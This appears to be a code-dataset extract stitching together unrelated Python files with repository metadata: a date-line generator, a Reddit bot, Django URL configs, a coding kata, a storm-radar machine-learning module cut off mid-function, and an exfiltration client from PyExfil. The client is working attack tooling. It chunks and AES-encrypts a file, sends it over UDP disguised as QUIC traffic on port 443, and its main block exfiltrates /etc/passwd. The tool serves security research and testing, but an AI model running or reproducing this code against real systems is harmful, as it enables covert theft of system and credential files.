return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))
print "Welcome to GenerateUpdateLines, the nation's favourite automatic update line generator."
start = int(raw_input("Enter initial day number: "))
stop = int(raw_input("Enter final day number: "))
t0 = datetime.date(2018, 3, 24)
for d in range(start, stop+1):
date = t0 + datetime.timedelta(d-1)
print "| "+str(d)+" | "+custom_strftime("%a {S} %B", date)+" | | |"
# from datetime import datetime as dt
#
# def suffix(d):
# return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
#
# def custom_strftime(format, t):
# return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))
#
# print custom_strftime('%B {S}, %Y', dt.now())
| ArthurStart/arthurstart.github.io | GenerateUpdateLines.py | Python | mit | 889 |
#!/usr/bin/python
import praw
import re
import os
import pickle
import random
#REPLY = "I want all the bacon and eggs you have."
REPLY = ["I want all the bacon and eggs you have", "I know what I'm about son", "I'm not interested in caring about people", "Is this not rap?"]
if not os.path.isfile("inigo_config.txt"):
print "You must create the file swanson_config.txt with the pickled credentials."
exit(1)
else:
print "Loading credentials"
user_data = pickle.load( open("swanson_config.txt","rb"))
#print user_data
user_agent = ("Swanson bot 0.1 created by /u/dcooper2.")
r = praw.Reddit(user_agent=user_agent)
r.login(user_data[0], user_data[1])
del user_data
print "Successfully logged in"
# Check for previous replies
if not os.path.isfile("replies.txt"):
replies = []
else:
print "Loading previous reply ids"
with open("replies.txt", "r") as f:
replies = f.read()
replies = replies.split("\n")
replies = filter(None, replies)
# Check for new items to reply to
subreddit = r.get_subreddit('umw_cpsc470Z')
print "Checking for new posts"
for submission in subreddit.get_hot(limit=10):
print "Checking submission ", submission.id
if submission.id not in replies:
if re.search("Ron Swanson", submission.title, re.IGNORECASE) or re.search("Ron Swanson", submission.selftext, re.IGNORECASE):
x = random.randint(0,3)
submission.add_comment(REPLY[x])
print "Bot replying to submission: ", submission.id
replies.append(submission.id)
print "Checking comments"
flat_comments = praw.helpers.flatten_tree(submission.comments)
for comment in flat_comments:
if comment.id not in replies:
if re.search("Ron Swanson", comment.body, re.IGNORECASE):
y = random.randint(0,3)
print "Bot replying to comment: ", comment.id
comment.reply(REPLY[y])
replies.append(comment.id)
# Save new replies
print "Saving ids to file"
with open("replies.txt", "w") as f:
for i in replies:
f.write(i + "\n")
| dcooper2/Swanson_Bot | swanson_bot.py | Python | mit | 2,143 |
from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import urls as djangoauth_urls
from search import views as search_views
from blog import views as blog_views
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtailcore import urls as wagtail_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
urlpatterns = [
url(r'^', include(djangoauth_urls)),
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/$', search_views.search, name='search'),
# For anything not caught by a more specific rule above, hand over to
# Wagtail's page serving mechanism. This should be the last pattern in
# the list:
url(r'', include(wagtail_urls)),
# Alternatively, if you want Wagtail pages to be served from a subpath
# of your site, rather than the site root:
# url(r'^pages/', include(wagtail_urls)),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| philba/myblog | myblog/urls.py | Python | mit | 1,474 |
from django.conf.urls import patterns, url
from links import views
urlpatterns = patterns('links.views',
url(r'^link/settings/$', views.settings, name = 'settings'),
url(r'^link/donate/(?P<url>[\d\w.]+)$', views.kintera_redirect, name = 'donate'),
url(r'^link/rider/(?P<url>[\d\w.]+)$', views.t4k_redirect, name = 'profile'),
) | ethanperez/t4k-rms | links/urls.py | Python | mit | 340 |
def get_planet_name(id):
switch = {
1: "Mercury",
2: "Venus",
3: "Earth",
4: "Mars",
5: "Jupiter",
6: "Saturn",
7: "Uranus" ,
8: "Neptune"}
return switch[id]
| NendoTaka/CodeForReference | CodeWars/8kyu/planetName.py | Python | mit | 231 |
import sys
import time
import socket
import struct
import random
import hashlib
import urllib2
from Crypto import Random
from Crypto.Cipher import AES
# from itertools import izip_longest
# Setting timeout so that we won't wait forever
timeout = 2
socket.setdefaulttimeout(timeout)
limit = 256*256*256*256 - 1
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def chunkstring(s, n):
return [ s[i:i+n] for i in xrange(0, len(s), n) ]
class AESCipher(object):
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(key.encode()).digest()
def encrypt(self, raw):
raw = self._pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return iv + cipher.encrypt(raw)
def decrypt(self, enc):
# enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
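# Hypothetical round-trip check for AESCipher (not part of the original script;
# the key and plaintext below are made up):
#
#     driver = AESCipher(key="123")
#     ciphertext = driver.encrypt("hello world")   # random 16-byte IV + CBC blocks
#     assert driver.decrypt(ciphertext) == "hello world"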
class QUICClient():
def __init__(self, host, key, port=443, max_size=4096):
# Params for all class
self.host = host
self.port = port
self.max_size = max_size - 60
self.AESDriver = AESCipher(key=key)
self.serv_addr = (host, port)
# Class Globals
self.max_packets = 255 # Limitation by QUIC itself.
        self._genSeq()                          # QUIC Sequence is used to know that this is the same sequence;
                                                # it's an 8-byte (64-bit) connection ID that is kept the same
                                                # throughout the session.
self.delay = 0.1
self.sock = None
        if self._createSocket() == 1:           # Creating a UDP socket object
sys.exit(1)
self.serv_addr = (self.host, self.port) # Creating socket addr format
def _genSeq(self):
self.raw_sequence = random.getrandbits(64)
parts = []
while self.raw_sequence:
parts.append(self.raw_sequence & limit)
self.raw_sequence >>= 32
self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
# struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4')
return 0
def _createSocket(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock = sock
return 0
except socket.error as e:
sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e)
return 1
def _getQUICHeader(self, count):
        if isinstance(count, int):
            try:
                count_id = chr(count)
            except ValueError:
                sys.stderr.write("Count must be an int between 0 and 255, or a single byte.\n")
                return 1
        else:
            count_id = count
if count > self.max_packets:
sys.stderr.write("[-]\tCount must be maximum of 255.\n")
return 1
header = "\x0c" # Public Flags
header += self.sequence # Adding CID
header += count_id # Packet Count
return header
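    # Layout of the custom header built above (this script's own framing, not
    # the real QUIC wire format):
    #   byte 0      : public flags (0x0c)
    #   bytes 1-8   : connection ID (the packed 64-bit sequence, typically 8 bytes)
    #   final byte  : packet count (0-255)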
def _getFileContent(self, file_path):
try:
f = open(file_path, 'rb')
data = f.read()
f.close()
sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path)
return data
except IOError, e:
sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e))
return 1
def sendFile(self, file_path):
# Get File content
data = self._getFileContent(file_path)
if data == 1:
return 1
# Check that the file is not too big.
if len(data) > (self.max_packets * self.max_size):
sys.stderr.write("[!]\tFile is too big for export.\n")
return 1
# If the file is not too big, start exfiltration
# Exfiltrate first packet
md5_sum = md5(file_path) # Get MD5 sum of file
packets_count = (len(data) / self.max_size)+1 # Total packets
first_packet = self._getQUICHeader(count=0) # Get header for first file
r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header
r_data = self.AESDriver.encrypt(r_data) # Encrypt data
self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data
sys.stdout.write("[+]\tSent initiation packet.\n")
# encrypted_content = self.AESDriver.encrypt(data)
# Encrypt the Chunks
raw_dat = ""
chunks = []
while data:
raw_dat += data[:self.max_size]
enc_chunk = self.AESDriver.encrypt(data[:self.max_size])
print len(enc_chunk)
chunks.append(enc_chunk)
data = data[self.max_size:]
i = 1
for chunk in chunks:
this_data = self._getQUICHeader(count=i)
this_data += chunk
self.sock.sendto(this_data, self.serv_addr)
time.sleep(self.delay)
sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count))
i += 1
sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port))
# self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
return 0
def close(self):
time.sleep(0.1)
self.sock.close()
return 0
if __name__ == "__main__":
client = QUICClient(host='127.0.0.1', key="123", port=443) # Setup a server
a = struct.unpack('<LL', client.sequence) # Get CID used
a = (a[1] << 32) + a[0]
sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a)
client.sendFile("/etc/passwd") # Exfil File
client.close() # Close
| ytisf/PyExfil | pyexfil/network/QUIC/quic_client.py | Python | mit | 6,330 |
"""Deals with input examples for deep learning.
One "input example" is one storm object.
--- NOTATION ---
The following letters will be used throughout this module.
E = number of examples (storm objects)
M = number of rows in each radar image
N = number of columns in each radar image
H_r = number of radar heights
F_r = number of radar fields (or "variables" or "channels")
H_s = number of sounding heights
F_s = number of sounding fields (or "variables" or "channels")
C = number of radar field/height pairs
"""
import copy
import glob
import os.path
import numpy
import netCDF4
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import soundings
from gewittergefahr.gg_utils import target_val_utils
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import number_rounding
from gewittergefahr.gg_utils import temperature_conversions as temp_conversion
from gewittergefahr.gg_utils import storm_tracking_utils as tracking_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
from gewittergefahr.deep_learning import storm_images
from gewittergefahr.deep_learning import deep_learning_utils as dl_utils
SEPARATOR_STRING = '\n\n' + '*' * 50 + '\n\n'
BATCH_NUMBER_REGEX = '[0-9][0-9][0-9][0-9][0-9][0-9][0-9]'
TIME_FORMAT_IN_FILE_NAMES = '%Y-%m-%d-%H%M%S'
DEFAULT_NUM_EXAMPLES_PER_OUT_CHUNK = 8
DEFAULT_NUM_EXAMPLES_PER_OUT_FILE = 128
NUM_BATCHES_PER_DIRECTORY = 1000
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME
]
TARGET_NAMES_KEY = 'target_names'
ROTATED_GRIDS_KEY = 'rotated_grids'
ROTATED_GRID_SPACING_KEY = 'rotated_grid_spacing_metres'
FULL_IDS_KEY = 'full_storm_id_strings'
STORM_TIMES_KEY = 'storm_times_unix_sec'
TARGET_MATRIX_KEY = 'target_matrix'
RADAR_IMAGE_MATRIX_KEY = 'radar_image_matrix'
RADAR_FIELDS_KEY = 'radar_field_names'
RADAR_HEIGHTS_KEY = 'radar_heights_m_agl'
SOUNDING_FIELDS_KEY = 'sounding_field_names'
SOUNDING_MATRIX_KEY = 'sounding_matrix'
SOUNDING_HEIGHTS_KEY = 'sounding_heights_m_agl'
REFL_IMAGE_MATRIX_KEY = 'reflectivity_image_matrix_dbz'
AZ_SHEAR_IMAGE_MATRIX_KEY = 'az_shear_image_matrix_s01'
MAIN_KEYS = [
FULL_IDS_KEY, STORM_TIMES_KEY, RADAR_IMAGE_MATRIX_KEY,
REFL_IMAGE_MATRIX_KEY, AZ_SHEAR_IMAGE_MATRIX_KEY, TARGET_MATRIX_KEY,
SOUNDING_MATRIX_KEY
]
REQUIRED_MAIN_KEYS = [
FULL_IDS_KEY, STORM_TIMES_KEY, TARGET_MATRIX_KEY
]
METADATA_KEYS = [
TARGET_NAMES_KEY, ROTATED_GRIDS_KEY, ROTATED_GRID_SPACING_KEY,
RADAR_FIELDS_KEY, RADAR_HEIGHTS_KEY, SOUNDING_FIELDS_KEY,
SOUNDING_HEIGHTS_KEY
]
TARGET_NAME_KEY = 'target_name'
TARGET_VALUES_KEY = 'target_values'
EXAMPLE_DIMENSION_KEY = 'storm_object'
ROW_DIMENSION_KEY = 'grid_row'
COLUMN_DIMENSION_KEY = 'grid_column'
REFL_ROW_DIMENSION_KEY = 'reflectivity_grid_row'
REFL_COLUMN_DIMENSION_KEY = 'reflectivity_grid_column'
AZ_SHEAR_ROW_DIMENSION_KEY = 'az_shear_grid_row'
AZ_SHEAR_COLUMN_DIMENSION_KEY = 'az_shear_grid_column'
RADAR_FIELD_DIM_KEY = 'radar_field'
RADAR_HEIGHT_DIM_KEY = 'radar_height'
RADAR_CHANNEL_DIM_KEY = 'radar_channel'
SOUNDING_FIELD_DIM_KEY = 'sounding_field'
SOUNDING_HEIGHT_DIM_KEY = 'sounding_height'
TARGET_VARIABLE_DIM_KEY = 'target_variable'
STORM_ID_CHAR_DIM_KEY = 'storm_id_character'
RADAR_FIELD_CHAR_DIM_KEY = 'radar_field_name_character'
SOUNDING_FIELD_CHAR_DIM_KEY = 'sounding_field_name_character'
TARGET_NAME_CHAR_DIM_KEY = 'target_name_character'
RADAR_FIELD_KEY = 'radar_field_name'
OPERATION_NAME_KEY = 'operation_name'
MIN_HEIGHT_KEY = 'min_height_m_agl'
MAX_HEIGHT_KEY = 'max_height_m_agl'
MIN_OPERATION_NAME = 'min'
MAX_OPERATION_NAME = 'max'
MEAN_OPERATION_NAME = 'mean'
VALID_LAYER_OPERATION_NAMES = [
MIN_OPERATION_NAME, MAX_OPERATION_NAME, MEAN_OPERATION_NAME
]
OPERATION_NAME_TO_FUNCTION_DICT = {
MIN_OPERATION_NAME: numpy.min,
MAX_OPERATION_NAME: numpy.max,
MEAN_OPERATION_NAME: numpy.mean
}
MIN_RADAR_HEIGHTS_KEY = 'min_radar_heights_m_agl'
MAX_RADAR_HEIGHTS_KEY = 'max_radar_heights_m_agl'
RADAR_LAYER_OPERATION_NAMES_KEY = 'radar_layer_operation_names'
def _read_soundings(sounding_file_name, sounding_field_names, radar_image_dict):
"""Reads storm-centered soundings and matches w storm-centered radar imgs.
:param sounding_file_name: Path to input file (will be read by
`soundings.read_soundings`).
:param sounding_field_names: See doc for `soundings.read_soundings`.
:param radar_image_dict: Dictionary created by
`storm_images.read_storm_images`.
:return: sounding_dict: Dictionary created by `soundings.read_soundings`.
:return: radar_image_dict: Same as input, but excluding storm objects with
no sounding.
"""
print('Reading data from: "{0:s}"...'.format(sounding_file_name))
sounding_dict, _ = soundings.read_soundings(
netcdf_file_name=sounding_file_name,
field_names_to_keep=sounding_field_names,
full_id_strings_to_keep=radar_image_dict[storm_images.FULL_IDS_KEY],
init_times_to_keep_unix_sec=radar_image_dict[
storm_images.VALID_TIMES_KEY]
)
num_examples_with_soundings = len(sounding_dict[soundings.FULL_IDS_KEY])
if num_examples_with_soundings == 0:
return None, None
radar_full_id_strings = numpy.array(
radar_image_dict[storm_images.FULL_IDS_KEY]
)
orig_storm_times_unix_sec = (
radar_image_dict[storm_images.VALID_TIMES_KEY] + 0
)
indices_to_keep = []
for i in range(num_examples_with_soundings):
this_index = numpy.where(numpy.logical_and(
radar_full_id_strings == sounding_dict[soundings.FULL_IDS_KEY][i],
orig_storm_times_unix_sec ==
sounding_dict[soundings.INITIAL_TIMES_KEY][i]
))[0][0]
indices_to_keep.append(this_index)
indices_to_keep = numpy.array(indices_to_keep, dtype=int)
radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY] = radar_image_dict[
storm_images.STORM_IMAGE_MATRIX_KEY
][indices_to_keep, ...]
radar_image_dict[storm_images.FULL_IDS_KEY] = sounding_dict[
soundings.FULL_IDS_KEY
]
radar_image_dict[storm_images.VALID_TIMES_KEY] = sounding_dict[
soundings.INITIAL_TIMES_KEY
]
return sounding_dict, radar_image_dict
def _create_2d_examples(
radar_file_names, full_id_strings, storm_times_unix_sec,
target_matrix, sounding_file_name=None, sounding_field_names=None):
"""Creates 2-D examples for one file time.
E = number of desired examples (storm objects)
e = number of examples returned
T = number of target variables
:param radar_file_names: length-C list of paths to storm-centered radar
images. Files will be read by `storm_images.read_storm_images`.
:param full_id_strings: length-E list with full IDs of storm objects to
return.
:param storm_times_unix_sec: length-E numpy array with valid times of storm
objects to return.
:param target_matrix: E-by-T numpy array of target values (integer class
labels).
:param sounding_file_name: Path to sounding file (will be read by
`soundings.read_soundings`). If `sounding_file_name is None`, examples
will not include soundings.
:param sounding_field_names: See doc for `soundings.read_soundings`.
:return: example_dict: Same as input for `write_example_file`, but without
key "target_names".
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(radar_file_names[0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_names[0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
num_channels = len(radar_file_names)
tuple_of_image_matrices = ()
for j in range(num_channels):
if j != 0:
print('Reading data from: "{0:s}"...'.format(radar_file_names[j]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
radar_field_names = [
storm_images.image_file_name_to_field(f) for f in radar_file_names
]
radar_heights_m_agl = numpy.array(
[storm_images.image_file_name_to_height(f) for f in radar_file_names],
dtype=int
)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
tuple_of_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
return example_dict
def _create_3d_examples(
radar_file_name_matrix, full_id_strings, storm_times_unix_sec,
target_matrix, sounding_file_name=None, sounding_field_names=None):
"""Creates 3-D examples for one file time.
:param radar_file_name_matrix: numpy array (F_r x H_r) of paths to storm-
centered radar images. Files will be read by
`storm_images.read_storm_images`.
:param full_id_strings: See doc for `_create_2d_examples`.
:param storm_times_unix_sec: Same.
:param target_matrix: Same.
:param sounding_file_name: Same.
:param sounding_field_names: Same.
:return: example_dict: Same.
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(radar_file_name_matrix[0, 0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_name_matrix[0, 0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
num_radar_fields = radar_file_name_matrix.shape[0]
num_radar_heights = radar_file_name_matrix.shape[1]
tuple_of_4d_image_matrices = ()
for k in range(num_radar_heights):
tuple_of_3d_image_matrices = ()
for j in range(num_radar_fields):
if not j == k == 0:
print('Reading data from: "{0:s}"...'.format(
radar_file_name_matrix[j, k]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_name_matrix[j, k],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_3d_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
tuple_of_4d_image_matrices += (
dl_utils.stack_radar_fields(tuple_of_3d_image_matrices),
)
radar_field_names = [
storm_images.image_file_name_to_field(f)
for f in radar_file_name_matrix[:, 0]
]
radar_heights_m_agl = numpy.array([
storm_images.image_file_name_to_height(f)
for f in radar_file_name_matrix[0, :]
], dtype=int)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
tuple_of_4d_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
return example_dict
def _create_2d3d_examples_myrorss(
azimuthal_shear_file_names, reflectivity_file_names,
full_id_strings, storm_times_unix_sec, target_matrix,
sounding_file_name=None, sounding_field_names=None):
"""Creates hybrid 2D-3D examples for one file time.
Fields in 2-D images: low-level and mid-level azimuthal shear
Field in 3-D images: reflectivity
:param azimuthal_shear_file_names: length-2 list of paths to storm-centered
azimuthal-shear images. The first (second) file should be (low)
mid-level azimuthal shear. Files will be read by
`storm_images.read_storm_images`.
:param reflectivity_file_names: length-H list of paths to storm-centered
reflectivity images, where H = number of reflectivity heights. Files
will be read by `storm_images.read_storm_images`.
:param full_id_strings: See doc for `_create_2d_examples`.
:param storm_times_unix_sec: Same.
:param target_matrix: Same.
:param sounding_file_name: Same.
:param sounding_field_names: Same.
:return: example_dict: Same.
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(reflectivity_file_names[0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=reflectivity_file_names[0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
azimuthal_shear_field_names = [
storm_images.image_file_name_to_field(f)
for f in azimuthal_shear_file_names
]
reflectivity_heights_m_agl = numpy.array([
storm_images.image_file_name_to_height(f)
for f in reflectivity_file_names
], dtype=int)
num_reflectivity_heights = len(reflectivity_file_names)
tuple_of_image_matrices = ()
for j in range(num_reflectivity_heights):
if j != 0:
print('Reading data from: "{0:s}"...'.format(
reflectivity_file_names[j]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=reflectivity_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
this_matrix = numpy.expand_dims(
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], axis=-1
)
tuple_of_image_matrices += (this_matrix,)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: azimuthal_shear_field_names,
RADAR_HEIGHTS_KEY: reflectivity_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
REFL_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
tuple_of_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
num_az_shear_fields = len(azimuthal_shear_file_names)
tuple_of_image_matrices = ()
for j in range(num_az_shear_fields):
print('Reading data from: "{0:s}"...'.format(
azimuthal_shear_file_names[j]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=azimuthal_shear_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
example_dict.update({
AZ_SHEAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
tuple_of_image_matrices)
})
return example_dict
def _read_metadata_from_example_file(netcdf_file_name, include_soundings):
"""Reads metadata from file with input examples.
:param netcdf_file_name: Path to input file.
:param include_soundings: Boolean flag. If True and file contains
soundings, this method will return keys "sounding_field_names" and
"sounding_heights_m_agl". Otherwise, will not return said keys.
:return: example_dict: Dictionary with the following keys (explained in doc
to `write_example_file`).
example_dict['full_id_strings']
example_dict['storm_times_unix_sec']
example_dict['radar_field_names']
example_dict['radar_heights_m_agl']
example_dict['rotated_grids']
example_dict['rotated_grid_spacing_metres']
example_dict['target_names']
example_dict['sounding_field_names']
example_dict['sounding_heights_m_agl']
:return: netcdf_dataset: Instance of `netCDF4.Dataset`, which can be used to
keep reading file.
"""
netcdf_dataset = netCDF4.Dataset(netcdf_file_name)
include_soundings = (
include_soundings and
SOUNDING_FIELDS_KEY in netcdf_dataset.variables
)
example_dict = {
ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
TARGET_NAMES_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:])
],
FULL_IDS_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[FULL_IDS_KEY][:])
],
STORM_TIMES_KEY: numpy.array(
netcdf_dataset.variables[STORM_TIMES_KEY][:], dtype=int
),
RADAR_FIELDS_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
],
RADAR_HEIGHTS_KEY: numpy.array(
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
)
}
# TODO(thunderhoser): This is a HACK to deal with bad files.
example_dict[TARGET_NAMES_KEY] = [
n for n in example_dict[TARGET_NAMES_KEY] if n != ''
]
if example_dict[ROTATED_GRIDS_KEY]:
example_dict[ROTATED_GRID_SPACING_KEY] = getattr(
netcdf_dataset, ROTATED_GRID_SPACING_KEY)
else:
example_dict[ROTATED_GRID_SPACING_KEY] = None
if not include_soundings:
return example_dict, netcdf_dataset
example_dict.update({
SOUNDING_FIELDS_KEY: [
